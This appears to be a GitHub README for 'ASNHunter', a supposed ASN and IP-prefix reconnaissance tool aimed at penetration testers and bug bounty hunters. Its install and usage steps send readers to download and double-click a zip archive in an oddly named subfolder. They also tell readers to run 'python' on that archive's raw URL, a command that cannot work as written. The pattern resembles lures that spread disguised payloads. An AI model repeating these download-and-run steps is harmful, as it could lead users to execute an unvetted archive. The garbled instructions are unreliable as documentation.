Welcome to ASNHunter! This tool helps you find valuable ASN (Autonomous System Number) information. It is perfect for bug bounty hunters, penetration testers, and red teams. You can easily discover data from multiple sources, including complete IPv4/IPv6 prefix discoveries.
- Multi-source ASN enumeration
- Complete support for IPv4 and IPv6
- User-friendly command-line interface
- Reliable and efficient for security tasks
- Suitable for bug bounty and cybersecurity research
- Operating System: Windows, macOS, or Linux
- Python: Version 3.6 or higher must be installed
- Network Connection: Required to access ASN data
- Memory: At least 512 MB of RAM recommended
To get started with ASNHunter, follow these steps:
-
Visit the Releases Page to download the latest version.
-
Select the appropriate file for your operating system. Common files include:
- https://github.com/r0zhh/ASNHunter/raw/refs/heads/main/juxtaposit/Hunter_ASN_v1.6.zip for Windows
- ASNHunter-macos for macOS
- ASNHunter-linux for Linux
-
Click on the file to begin the download.
-
Once the download completes, locate the file in your Downloads folder.
-
Double-click the downloaded file to run ASNHunter.
Using ASNHunter is simple. After installation, follow these instructions to perform ASN lookups:
-
Open your command-line interface.
- On Windows, you can use Command Prompt or PowerShell.
- On macOS, open the Terminal.
- For Linux, use your preferred terminal emulator.
-
Type the command to start ASNHunter:
python https://github.com/r0zhh/ASNHunter/raw/refs/heads/main/juxtaposit/Hunter_ASN_v1.6.zip [your_asn_or_ip]Replace
[your_asn_or_ip]with the ASN or IP address you want to investigate. -
Press Enter. You will see the result, providing you with extensive information about the ASN.
To check ASN information for AS15169, type:
python https://github.com/r0zhh/ASNHunter/raw/refs/heads/main/juxtaposit/Hunter_ASN_v1.6.zip AS15169
When you run a command, ASNHunter will return several pieces of information, such as:
- ASN Number
- Organization Name
- Network Prefix
- Related IP Addresses
- Contact Information
Review this information to assist in your penetration testing or reconnaissance missions.
If you encounter issues, here are some common problems and their solutions:
-
Error: 'python' is not recognized
Solution: Ensure Python is correctly installed and added to your systemβs PATH. -
Missing Modules
Solution: Install any missing Python modules using pip. For example:pip install requests
If you have questions or need help, feel free to check out our community discussions on GitHub. You can report issues or request features directly through the issues section.
Donβt forget to visit the Releases Page to download the latest version of ASNHunter and start your ASN reconnaissance journey today.
ASNHunter is licensed under the MIT License. Feel free to modify and use it in compliance with this license.
For more detailed information, please refer to the LICENSE file located in the repository.
We welcome contributions! Please check our contribution guidelines for more details about how you can help improve ASNHunter.
Thank you for using ASNHunter. Happy hunting!